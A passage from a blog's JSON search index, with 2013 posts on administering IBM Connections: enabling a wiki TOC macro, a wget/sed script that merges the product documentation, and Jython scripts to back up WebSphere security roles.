la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eShellEd: \u003ca href=\"http://sourceforge.net/projects/shelled/files/shelled/update/\" target=\"_blank\"\u003ehttp://sourceforge.net/projects/shelled/files/shelled/update/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"sql-scripts\"\u003eSQL Scripts \u003ca href=\"#sql-scripts\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eSQL Explorer: \u003ca href=\"http://eclipsesql.sourceforge.net/\" target=\"_blank\"\u003ehttp://eclipsesql.sourceforge.net/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-09-15-eclipse-as-a-jython-ide/","title":"Eclipse As A Jython IDE"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/iconuk/","title":"IconUK"},{"body":"This year i attended the ICON UK in Brighton. I enjoyed it very much to speak in front of a great audience and to meet friends and “lotus” guys again.\nYou can review my session slides here .\nI extended some scripts from socconv and add a short part jython introduction.\n","excerpt":"\u003cp\u003eThis year i attended the ICON UK in Brighton. I enjoyed it very much to\nspeak in front of a great audience and to meet friends and “lotus” guys\nagain.\u003c/p\u003e\n\u003cp\u003eYou can review my session slides \u003ca href=\"http://resources.stoeps.de/iconok2013\" target=\"_blank\"\u003ehere \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI extended some scripts from socconv and add a short part jython\nintroduction.\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-09-05-iconuk-2013/","title":"ICONUK 2013"},{"body":"I have read about a new function in IBM Connections Wiki, which I missed until now. A new macro to create a table of contents within a wiki page.\nThe activation of this macro is documented here: Wikis configuration properties wikimacros.enabled Specifies whether macros are enabled in Wikis. You can use macros to automate common tasks, such as generating a table of contents in a wiki page. The default value of this parameter is false. To enable macros, set the value to true. When enabled, macros are available from the Macros menu in the editor toolbar.\nDocumentation I’m a little confused (the config option should be editor.wikimacros.enabled).\nwikis-config.xml: \u0026lt;editor\u0026gt; \u0026lt;wikitexttab enabled=\u0026#34;true\u0026#34; /\u0026gt; \u0026lt;wikimacros enabled=\u0026#34;true\u0026#34; /\u0026gt; \u0026lt;!-- add this line --\u0026gt; \u0026lt;/editor\u0026gt; After checking in the configuration file and restart connections I got a new button in my wikis\u0026rsquo; editor:\nQuite cool, but the macro only generate headings with format h2, h3 and h4 to the TOC. The Richtext editor provides headings h1-h4. I want to change this behavior, that h1 will be added to TOC too.\nI found a great article on adding templates to CKEditor from Rob Novak , there he describes how you can customize the CKEditor of wikis. I used the paths mentioned in this article to customize the TOC behavior.\nThe link is no longer available, I couldn\u0026rsquo;t find the article anywhere. So I keep this link as a reference. Thanks again Rob.\nExtract toc.js You can find the needed file com.ibm.lconn.wikis.web.resources_3.5.0.20130627-1601.jar in your shared directory, e.g. /opt/IBM/Connections/data/shared/provision/webresources. I extracted it to /tmp:\nunzip -d /tmp/ckeditor /opt/IBM/Connections/data/shared/provision/webresources/com.ibm.lconn.wikis.web.resources_3.5.0.20130627-1601.jar Create customization path and copy toc.js mkdir -p /opt/IBM/Connections/data/shared/customization/javascript/lconn/wikis/macros cp /tmp/ckeditor/resources/macros/toc.js /opt/IBM/Connections/data/shared/customization/javascript/lconn/wikis/macros Change toc.js vim /opt/IBM/Connections/data/shared/customization/javascript/lconn/wikis/macros/toc.js You find the following part:\nlconn.wikis.macros.toc = { //node id sequence for TOC link. fragmentSeqn: 1, topLevel: 2, bottomLevel: 4, template: \u0026#39;Table of Contents:\u0026lt;INSERT-BODY\u0026gt;\u0026#39;, You have to change topLevel and bottomLevel to following:\nlconn.wikis.macros.toc = { //node id sequence for TOC link. fragmentSeqn: 1, topLevel: 1, bottomLevel: 5, template: \u0026#39;Table of Contents:\u0026lt;INSERT-BODY\u0026gt;\u0026#39;, After a new Connections restart my toc got updated with h1 – h5.\nUpdate Change Styles If you want to change the default style of your tocs, you can do this in the toc.js file too! I prefer my TOC on the right screen side and with a light grey not yellow background.\nI changed:\nstyle: \u0026#39;border-radius: 6px; margin: 8px; padding: 4px; display: block; width: 50%;background-color: #ffc;\u0026#39;, To:\nstyle: \u0026#39;border-radius: 6px; margin: 8px; padding: 4px; display: block; width: 30%;background-color: #E0E0E0;float:right;padding:10px;margin-left:20px;margin-bottom:20px;\u0026#39;, Now i have a little bit smaller toc with additional space to the content:\nIt would be better to define the styles through a CSS file in the customization folder, but I only wanted to test it. When you want to change through a CSS file, then you should remove most of the styles from the line starting with: style:.\nUpdate 2022-07-11 I tested the configuration today with Connections 7.0 and installed CFix.70.2206. Except of the jar name, which is now com.ibm.lconn.wikis.web.resources_3.5.0.20220608-0715.jar, the whole process to enable and customize is still working. After changing wikis-config.xml the Macros \u0026gt; Table Of Contents button appears in all Connections editors (CKEditor, textbox.io and TinyMCE)!\n","excerpt":"\u003cp\u003eI have read about a new function in IBM Connections Wiki, which I missed until now.\nA new macro to create a table of contents within a wiki page.\u003c/p\u003e\n\u003cp\u003eThe activation of this macro is documented here:\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/xpDocViewer.xsp?lookupName=IBM%20Connections%204.5%20Documentation#action=openDocument\u0026amp;res_title=Wikis_configuration_properties_ic45\u0026amp;content=pdcontent\u0026amp;sa=true\" target=\"_blank\"\u003eWikis configuration properties \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\n\u003cblockquote class=\"blockquote px-4 py-2 bg-secondary mx-md-3 mx-xl-5 rounded fst-italic stoeps-blockquote\" \u003e\n \u003cdiv class=\"d-flex flex-row\"\u003e\n \u003cdiv class=\"me-3\"\u003e\n \u003ci class=\"las la-sms la-3x\"\u003e\u003c/i\u003e\n \u003c/div\u003e\u003cdiv\u003e\u003cp class=\"mb-0\"\u003e\n \u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-fallback\" data-lang=\"fallback\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewikimacros.enabled\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eSpecifies whether macros are enabled in Wikis. You can use macros to automate common tasks, such as generating a table of contents in a wiki page. The default value of this parameter is false. To enable macros, set the value to true. When enabled, macros are available from the Macros menu in the editor toolbar.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/activate-customize-table-of-contents-macro-in-ibm-connections-wiki/","title":"Activate and customize “Table of contents” macro in IBM Connections Wiki"},{"body":"The IBM Connections Product Documentation is only available as a set of Wiki Documents and in a accessible version (5 single html documents) .\nI don’t like both versions. Searching is hard and printing only single documents (to paper or pdf) is a torture. The format is only for a complete display, no mobile version and using only half of a display do not wrap the text.\nSo i want to have a converted document which is searchable, has numbered headlines and can be converted to mobi or kindle format.\nYou want this too? How? Requirements Linux VM (e.g. Knoppix or other Live Linux)\nHTML Tidy sed wget I created a linux shell script which downloads the accessible version of the product documentation and removes / adds some lines. I added a alternative stylesheet (numbering headlines) and a javascript file (toc on top of the document) . Copy both files to the directory of the html documentation.\nHere the script and some explanations on it:\n#!/bin/bash wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p1.html wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p2.html wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p3.html wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p4.html wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p5.html Download the html files inclusivly with images, scripts and stylesheets.\nAfter downloading the files, change to the folder of acc_p1.html:\nFILEPATH=infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us cd $FILEPATH Run tidy on the html files to seperate the html tags and indent the code:\nfor i in $(seq 1 5); do tidy -wrap 0 -c -i acc_p${i}.html \u0026gt; acc_p${i}_a.html done No remove the html header and toc of the files:\n# remove head and foot (incl toc) for i in $(seq 1 5); do sed \u0026#39;1,/\u0026lt;div class=\u0026#34;nested0\u0026#34; role=\u0026#34;main\u0026#34;/d;/\u0026lt;\\/body\u0026gt;/,$d\u0026#39; acc_p${i}_a.html \u0026gt; acc_p${i}_b.html done Create a file with header informations (title, stylesheets):\nsed \u0026#39;/\u0026lt; \\/head\u0026gt;/,$d\u0026#39; acc_p1.html \u0026gt; head.html sed -i \u0026#39;s/\u0026lt;link rel=\u0026#34;stylesheet\u0026#34;[^/\u0026gt;]*\u0026gt;//g\u0026#39; head.html sed -i \u0026#39;/\u0026lt;title\u0026gt;/d\u0026#39; head.html echo \u0026#39;\u0026lt;link rel=\u0026#34;stylesheet\u0026#34; type=\u0026#34;text/css\u0026#34; href=\u0026#34;custom.css\u0026#34; /\u0026gt;\u0026#39; \u0026gt;\u0026gt; head.html echo \u0026#39;\u0026lt;/title\u0026gt;\u0026lt;title\u0026gt;IBM Connections 4.5 CR1\u0026lt;/title\u0026gt;\u0026#39; \u0026gt;\u0026gt; head.html echo \u0026#39;\u0026lt;script type=\u0026#34;text/javascript\u0026#34; src=\u0026#34;toc.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt;\u0026#39; \u0026gt;\u0026gt; head.html echo \u0026#39;\u0026lt;body\u0026gt;\u0026#39; \u0026gt;\u0026gt; head.html Create a file with footer informations:\nsed \u0026#39;/\u0026lt; \\/body\u0026gt;/,$d\u0026#39; acc_p1.html \u0026gt; foot.html Create a singe html file of the Connections documentation and add head and foot:\ncat head.html \u0026gt; cnx45documentation.html for i in $(seq 1 5) ; do cat acc_p${i}_b.html \u0026gt;\u0026gt; cnx45documentation.html done cat foot.html \u0026gt;\u0026gt; cnx45documentation.html Rewrite all links and anchors to the new filename:\nsed -i -e \u0026#39;s/href=\u0026#34;acc_p[1-5].html#/href=\u0026#34;cnx45documentation.html#/g\u0026#39; cnx45documentation.html So you’re nearly done! Copy the custom.css and toc.js in the directory and you can open the documentation. You can use half display, print to pdf, convert it to kindle (e.g. calibre) and other ebook formats.\nThe script does not delete temporary files. I copy only cnxdocumentation.html, toc.js and custom.css to a seperate folder and delete the downloaded files. If you want the images (there are only few), you need to copy these too.\nConfiguration of toc.js Here is my setting i used for the toc.\ncontainer : \u0026#34;false\u0026#34;, headline : 1, minNavPoints : 2, insertAfter : \u0026#34;body\u0026#34;, headlineText : \u0026#34;Table of Contents\u0026#34;, listType : \u0026#34;OL\u0026#34;, Download the script file. custom.css h1{counter-reset: h2counter} h2{counter-reset: h3counter} h3{counter-reset: h4counter} h4{counter-reset: h5counter} h5{counter-reset: h6counter} h1:before{ counter-increment: h1counter; content: counter(h1counter) \u0026#34; \u0026#34;; } h2:before{ counter-increment: h2counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34; \u0026#34;; } h3:before{ counter-increment: h3counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34;.\u0026#34; counter(h3counter) \u0026#34; \u0026#34;; } h4:before{ counter-increment: h4counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34;.\u0026#34; counter(h3counter) \u0026#34;.\u0026#34; counter(h4counter) \u0026#34; \u0026#34;; } h5:before{ counter-increment: h5counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34;.\u0026#34; counter(h3counter) \u0026#34;.\u0026#34; counter(h4counter) \u0026#34;.\u0026#34; counter(h5counter) \u0026#34; \u0026#34;; } h6:before{ counter-increment: h6counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34;.\u0026#34; counter(h3counter) \u0026#34;.\u0026#34; counter(h4counter) \u0026#34;.\u0026#34; counter(h5counter) \u0026#34;.\u0026#34; counter(h6counter) \u0026#34; \u0026#34;; } body{font-family:sans-serif; max-width:1024px; min-width:300px; left:auto; right:auto; font-size:12px; } p { font-size:11px; line-height:110%; } code,kbd { margin:10px; } h1,h2,h3,h4,h5,h6{ color:darkblue; font-weight:bold; font-size:110%; } You can download the script and css file on github:\nhttps://github.com/stoeps13/ibmcnxscripting/tree/master/web/createdocu ","excerpt":"\u003cp\u003eThe \u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf\" target=\"_blank\"\u003eIBM Connections Product\nDocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is only available as a set of Wiki Documents and in a\n\u003ca href=\"http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_top.html\" target=\"_blank\"\u003eaccessible\nversion (5 single html documents) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI don’t like both versions. Searching is hard and printing only single\ndocuments (to paper or pdf) is a torture. The format is only for a\ncomplete display, no mobile version and using only half of a display do\nnot wrap the text.\u003c/p\u003e\n\u003cp\u003eSo i want to have a converted document which is searchable, has\n\u003ca href=\"http://stackoverflow.com/questions/535334/html-css-autonumber-headings\" target=\"_blank\"\u003enumbered\nheadlines \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and can be converted to mobi or kindle format.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/07/2013-07-15_21-36-58.png\" alt=\"2013 07 15 21 36 58\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003ch1 id=\"you-want-this-too-how\"\u003eYou want this too? How? \u003ca href=\"#you-want-this-too-how\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003ch2 id=\"requirements\"\u003eRequirements \u003ca href=\"#requirements\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLinux VM (e.g. \u003ca href=\"http://www.knoppix.org/\" target=\"_blank\"\u003eKnoppix \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n or other Live Linux)\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-07-15-create-a-printable-and-portable-connections-product-docu/","title":"Create a printable and portable Connections Product Documentation"},{"body":"Because of a delay of some hours on my flight back from Social Connections V on saturday, i had time to rewrite the jython script for backing up and restore security roles in WebSphere Application Server.\nI updated the master branch on GitHub , which now contains a db2 initscript and the two new scripts securityrolebackup.py and securityrolerestore.py !\nYou can call the scripts through wsadmin.sh|bat and they do following.\nsecurityrolebackup.sh cd $WAS_HOME/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -username admin -password password -f \u0026#34;path/securityrolebackup.sh\u0026#34; \u0026#34;../temp\u0026#34; This will save the security roles for each installed application to $WAS_HOME/profiles/Dmgr01/temp to single files named: Application.txt.\nsecurityrolerestore.sh cd $WAS_HOME/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -username admin -password password -f \u0026#34;path/securityrolerestore.sh\u0026#34; \u0026#34;../temp\u0026#34; This will take the backups from $WAS_HOME/profiles/Dmgr01/temp and restore all access rights in the single applications. All applications will be restored, but you can change the script for one or some of the applications, when you change from line 49:\n49 apps = AdminApp.list() 50 appsList = apps.split(lineSeparator) 51 # Test with some Apps: 52 # appsList = [\u0026#39;Blogs\u0026#39;,\u0026#39;Activities\u0026#39;,\u0026#39;Wikis\u0026#39;] 53 # or Single App: 54 # appsList = [\u0026#39;Blogs\u0026#39;] Comment out line 49 and 50, and remove # from line 52 to restore only some Application security roles, or remove # from 54 to restore only one!\nTipp I had several updates and cr installations with IBM Connections the last years and on some of these the updateinstaller removes my configured security roles. Now you can backup before and restore after installing a fix.\nDisclaimer These scripts are provided as is, with no warranties, and confers no rights! Please test them before using in production environments.\n","excerpt":"\u003cp\u003eBecause of a delay of some hours on my flight back from\n\u003ca href=\"http://socialconnections.info\" target=\"_blank\"\u003eSocial Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n V on saturday, i had\ntime to rewrite the \u003ca href=\"http://www.jython.org\" target=\"_blank\"\u003ejython \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n script for backing up\nand restore security roles in WebSphere Application Server.\u003c/p\u003e\n\u003cp\u003eI updated the \u003ca href=\"http://github.com/stoeps13/ibmcnxscripting\" target=\"_blank\"\u003emaster branch\non GitHub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which now contains a db2 initscript and the two new scripts\n\u003ca href=\"https://github.com/stoeps13/ibmcnxscripting/blob/master/websphere/securityrolebackup.py\" target=\"_blank\"\u003esecurityrolebackup.py \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nand\n\u003ca href=\"https://github.com/stoeps13/ibmcnxscripting/blob/master/websphere/securityrolerestore.py\" target=\"_blank\"\u003esecurityrolerestore.py \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n!\u003c/p\u003e\n\u003cp\u003eYou can call the scripts through wsadmin.sh|bat and they do following.\u003c/p\u003e\n\u003ch1 id=\"securityrolebackupsh\"\u003esecurityrolebackup.sh \u003ca href=\"#securityrolebackupsh\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003ecd\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003e$WAS_HOME\u003c/span\u003e/profiles/Dmgr01/bin\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e./wsadmin.sh -lang jython -username admin -password password -f \u003cspan style=\"color:#2aa198\"\u003e\u0026#34;path/securityrolebackup.sh\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#2aa198\"\u003e\u0026#34;../temp\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eThis will save the security roles for each installed application to\n\u003ccode\u003e$WAS_HOME/profiles/Dmgr01/temp\u003c/code\u003e to single files named: Application.txt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-07-01-soccnx-more-scripts-added/","title":"SocCnx: more scripts added"},{"body":"Today i spoke at Social Connections V User Group Meeting in Zurich. What should i say. It was a pleasure and i enjoyed it very much. Hope we can discuss more scripts the next weeks.\nSession Slides Here you can watch the session slides:\nSaving my time using scripts #soccnx #soccnxv Scripts Download You can download all scripts without warranty and on your own risk on:\nhttp://www.github.com/stoeps13/ibmcnxscripting Please download the master branch, develop and bugfix can contain not ready scripts.\nSlidedownload soccnx More Slides on http://www.slideshare.net/soccnx Update 2022: Slideshare is requesting a paid scibd account now (30 day evaluation possible). I have removed all my slides from Slideshare, you can find them under [https://stoeps.de/speaking/](Public Speaking). ","excerpt":"\u003cp\u003eToday i spoke at Social Connections V User Group Meeting in Zurich. What\nshould i say. It was a pleasure and i enjoyed it very much. Hope we can\ndiscuss more scripts the next weeks.\u003c/p\u003e\n\u003ch1 id=\"session-slides\"\u003eSession Slides \u003ca href=\"#session-slides\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eHere you can watch the session slides:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://share.stoeps.de/2013-socconv-scriptingcnx.pdf\" target=\"_blank\"\u003eSaving my time using scripts #soccnx #soccnxv \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"scripts-download\"\u003eScripts Download \u003ca href=\"#scripts-download\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eYou can download all scripts without warranty and on your own risk on:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.github.com/stoeps13/ibmcnxscripting\" target=\"_blank\"\u003ehttp://www.github.com/stoeps13/ibmcnxscripting \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003ePlease download the master branch, develop and bugfix can contain not\nready scripts.\u003c/p\u003e\n\u003ch1 id=\"slidedownload-soccnx\"\u003eSlidedownload soccnx \u003ca href=\"#slidedownload-soccnx\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eMore Slides on \u003ca href=\"https://www.slideshare.net/soccnx\" target=\"_blank\"\u003ehttp://www.slideshare.net/soccnx \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\u003cdiv class=\"alert alert-warning d-flex align-items-center border border-warning\" role=\"alert\"\u003e\n \u003ci class=\"las la-exclamation-circle la-3x align-middle\"\u003e\u003c/i\u003e\n \u003cdiv class=\"p-2 pb-0 align-middle\"\u003e\n Update 2022: Slideshare is requesting a paid scibd account now (30 day evaluation possible). I have removed all my slides from Slideshare, you can find them under [https://stoeps.de/speaking/](Public Speaking).\n \u003c/div\u003e\n\u003c/div\u003e","ref":"https://stoeps.de/posts/2013/2013-06-29-saving-my-time-using-scripts/","title":"Saving my time using scripts – Social Connections V"},{"body":"After the online documentation assumes CR1 since one week, you can finally download CR1 on FixCentral .\nRead more at Michael Urspringer’s Blog .\n","excerpt":"\u003cp\u003eAfter the\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/xpViewCategories.xsp?lookupName=Product%20Documentation\" target=\"_blank\"\u003eonline\ndocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n assumes CR1 since one week, you can finally download\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Lotus\u0026amp;product=ibm/Lotus/Lotus%20Connections\u0026amp;release=4.5.0.0\u0026amp;platform=Windows\u0026amp;function=all\" target=\"_blank\"\u003eCR1\non FixCentral \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eRead more at\n\u003ca href=\"http://www.urspringer.de/2013/06/26/ibm-connections-4-5-cumulative-refresh-1-cr1-just-arrived/\" target=\"_blank\"\u003eMichael\nUrspringer’s Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-06-27-connections-4-5-cr1-finally-arrived/","title":"IBM Connections 4.5 CR1 finally arrived"},{"body":"You can download the version 1.3 of IBM Connections Mail in Greenhouse Catalog (Login required)!\nhttps://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026documentId=2118E657CE35A81F85257B2C0083B92D Requirements: IBM Connections 4.5 (+ mandatory iFixes – see IBM Connections support site) + IBM Connections 4.5 interim fix LO74571\nOne or more of the following:\nIBM Lotus Domino 8.5.3 FP3 or later\nIBM Domino 9.0 Social Edition\nMicrosoft Exchange 2007 SP3\nMicrosoft Exchange 2010 SP1\n","excerpt":"\u003cp\u003eYou can download the\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=2118E657CE35A81F85257B2C0083B92D\" target=\"_blank\"\u003eversion\n1.3 of IBM Connections Mail \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in\n\u003ca href=\"http://greenhouse.lotus.com/catalog\" target=\"_blank\"\u003eGreenhouse Catalog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n (Login\nrequired)!\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/04/2013-04-10_20-35-42.png\" alt=\"2013 04 10 20 35 42\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=2118E657CE35A81F85257B2C0083B92D\" target=\"_blank\"\u003ehttps://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026documentId=2118E657CE35A81F85257B2C0083B92D \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"requirements\"\u003eRequirements: \u003ca href=\"#requirements\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIBM Connections 4.5 (+ mandatory iFixes – see IBM Connections support\nsite) + IBM Connections 4.5 interim fix LO74571\u003c/p\u003e\n\u003cp\u003eOne or more of the following:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eIBM Lotus Domino 8.5.3 FP3 or later\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIBM Domino 9.0 Social Edition\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMicrosoft Exchange 2007 SP3\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMicrosoft Exchange 2010 SP1\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2013/2013-04-10-ibm-connections-mail-1-3-is-available-works-with-connections-4-5/","title":"IBM Connections Mail 1.3 is available (works with Connections 4.5)"},{"body":"IBM sent me a mail today, their logs show that i downloaded CR3 and they want to tell me, that i need one fix more, when i use Notes 9 Social Edition.\nI was really surprised and impressed.\nHere the download link for LO74465 .\n","excerpt":"\u003cp\u003eIBM sent me a mail today, their logs show that i downloaded CR3 and they\nwant to tell me, that i need one fix more, when i use Notes 9 Social\nEdition.\u003c/p\u003e\n\u003cp\u003eI was really surprised and impressed.\u003c/p\u003e\n\u003cp\u003eHere the\n\u003ca href=\"http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Lotus%20Connections\u0026amp;release=4.0.0.0\u0026amp;platform=All\u0026amp;function=fixId\u0026amp;fixids=4.0.0.0-IC-Multi-COMMON-CR3-LO73535-LO74465\u0026amp;includeRequisites=0\u0026amp;includeSupersedes=0\u0026amp;downloadMethod=http\u0026amp;source=fc\" target=\"_blank\"\u003edownload\nlink for LO74465 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-22-additional-fix-lo74465-for-connections-cr3-and-notes-9-social-edition/","title":"Additional fix (LO74465) for Connections CR3 and Notes 9 Social Edition"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-notes/","title":"HCL Notes"},{"body":"You find the default system requirements in the overview document: “http://www-01.ibm.com/support/docview.wss?uid=swg27007909[Index of system requirements for Notes, Domino, Domino Administrator, Domino Designer \u0026amp; Notes Traveler]“\nI’ve some interesting points. IBM Domino for Windows is available as 32 and 64 bit software, but it is only supported on Windows Server 2008 R2 and Windows Server 2012, so no 32 Bit Windows is supported!\nSo a lot of us will have to upgrade the OS first.\nSystem Requirements Notes 9.0 System Requirements Domino Administrator \u0026amp; Domino Designer 9.0 System Requirements Domino 9.0 System Requirements Notes Traveler 9.0 We got a Linux 64 Bit server the first time in a gold release. I tested it in the beta and it works without any problems.\n","excerpt":"\u003cp\u003eYou find the default system requirements in the overview document:\n“http://www-01.ibm.com/support/docview.wss?uid=swg27007909[Index of\nsystem requirements for Notes, Domino, Domino Administrator, Domino\nDesigner \u0026amp; Notes Traveler]“\u003c/p\u003e\n\u003cp\u003eI’ve some interesting points. IBM Domino for Windows is available as 32\nand 64 bit software, but it is only supported on Windows Server 2008 R2\nand Windows Server 2012, so no 32 Bit Windows is supported!\u003c/p\u003e\n\u003cp\u003eSo a lot of us will have to upgrade the OS first.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.ibm.com/support/docview.wss?uid=swg27037998\" target=\"_blank\"\u003eSystem\nRequirements Notes 9.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca 